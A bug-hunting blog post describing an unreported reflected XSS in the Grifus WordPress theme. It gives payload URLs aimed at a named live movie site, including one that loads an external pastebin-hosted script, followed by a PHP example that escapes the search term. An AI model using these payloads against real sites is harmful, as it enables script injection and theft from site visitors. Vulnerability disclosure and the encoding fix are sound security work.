Hello friends, good afternoon everyone. This time I am sharing some more bugs that I found on one of the movie download sites, a fairly large one: GUDANGMOVIES21.
Title: Grifus WordPress Themes XSS Vuln
Affected Version: 4.0.1
Homepage: https://mundothemes.com/grifus/
============
Why don't you just report it? The point is that I'm too lazy to report bugs like this; in the end they just get underestimated. They say XSS is just a trivial thing, hihi, so I can't be bothered. Better to just do a write-up and share the experience.
Here is the payload that I used:
<script>prompt(document.domain)</script>
For the vulnerable URL and parameter, see below:
https://gudangmovies21.today/?s=<script>prompt(document.domain)</script>
Alright, maybe that's all for today, thank you ...
That's all from me, Happy Bug Hunting and thanks for coming here.
Not only that, I also tried to use an HTML script in the XSS this time, and it worked. Here is the payload:
https://gudangmovies21.today/?s=<script src=https://pastebin.com/raw/VX2Sig1t/></script>
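For the defensive side of the reflected `s` parameter described above, here is an added example that is not part of the original post and is not code from the Grifus theme. It assumes the search term is echoed into the results page without encoding; the function names and the third sample term are hypothetical, and the first two sample terms are the ones from this write-up.

```php
<?php
// Added illustration, not Grifus theme code. Function names are hypothetical.

// Assumed vulnerable pattern: the raw ?s= value is concatenated into HTML.
function render_heading_unsafe(string $s): string {
    return '<h1>Search results for: ' . $s . '</h1>';
}

// Encode HTML metacharacters (< > & " ') before output.
// Inside WordPress the equivalents are esc_html() for element text and
// esc_attr() for attribute values; the_search_query() already escapes.
function encode(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_heading_safe(string $s): string {
    return '<h1>Search results for: ' . encode($s) . '</h1>';
}

// The search box usually repeats the term inside an attribute, so quotes
// must be encoded as well (ENT_QUOTES covers both " and ').
function render_search_box_safe(string $s): string {
    return '<input type="search" name="s" value="' . encode($s) . '">';
}

// True when the rendered HTML still contains a live <script tag.
function has_script_tag(string $html): bool {
    return stripos($html, '<script') !== false;
}

$samples = [
    '<script>prompt(document.domain)</script>',                 // from the write-up
    '<script src=https://pastebin.com/raw/VX2Sig1t/></script>', // from the write-up
    'tom "and" jerry',                                          // constructed benign term
];

foreach ($samples as $s) {
    printf("term:   %s\n", $s);
    printf("unsafe: %s (script tag: %s)\n", render_heading_unsafe($s),
        has_script_tag(render_heading_unsafe($s)) ? 'yes' : 'no');
    printf("safe:   %s (script tag: %s)\n", render_heading_safe($s),
        has_script_tag(render_heading_safe($s)) ? 'yes' : 'no');
    printf("input:  %s\n\n", render_search_box_safe($s));
}
```

With the encoded output the browser displays the search term as text, so neither the inline script nor the externally hosted one is parsed as markup.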